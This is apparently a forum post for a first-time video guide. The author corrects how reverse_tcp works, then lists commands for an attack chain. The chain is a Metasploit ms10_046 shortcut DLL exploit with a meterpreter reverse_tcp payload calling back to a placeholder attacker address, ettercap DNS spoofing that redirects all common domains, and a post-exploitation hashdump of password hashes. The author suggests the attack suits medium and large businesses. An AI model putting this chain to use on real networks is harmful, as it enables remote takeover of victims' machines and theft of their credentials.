I realize there are a few mistakes in this video, I was nervous and slipped up. Specifically how reverse_tcp works.

To explain the mistake, I mentioned in the video that reverse_tcp creates a socket on the victim machine and our attacking machine will connect to that socket. This is actually how bind_tcp works. reverse_tcp creates a socket on the attacking machine and lets the victim machine connect as a client. Just wanted to make sure it's clear I know the difference I realized when I recorded it I had made a mistake, as you can probably tell by the mumbling, but I just went with it.

I believe that this attack would work really well on medium and large sized businesses, if you can get access to the network either via wifi or by physical means. The redirect to the UNC path looks very scary, but I think most users will chalk it up to terrible IT support or weird phantom network issues.

I appreciate any criticism, this is the first video I've made and really the first time I've posted a guide on here.

Commands:
MSF:
Code:
    use windows/browser/ms10_046_shortcut_icon_dllloader

    set SRVHOST ATTACKER_IP_ADDR

    set PAYLOAD windows/meterpreter/reverse_tcp

    set LHOST ATTACKER_IP_ADDR

    exploit
ettercap:
Code:
    cat /usr/share/ettercap/etter.dns
    *.com A 192.168.217.133
    *.net A 192.168.217.133
    *.org A 192.168.217.133
    *.gov A 192.168.217.133
Code:
    ettercap -T -q -i eth0 -P dns_spoof // //
MSF post exploitation:
Code:
    sessions -i 1

    use priv

    hashdump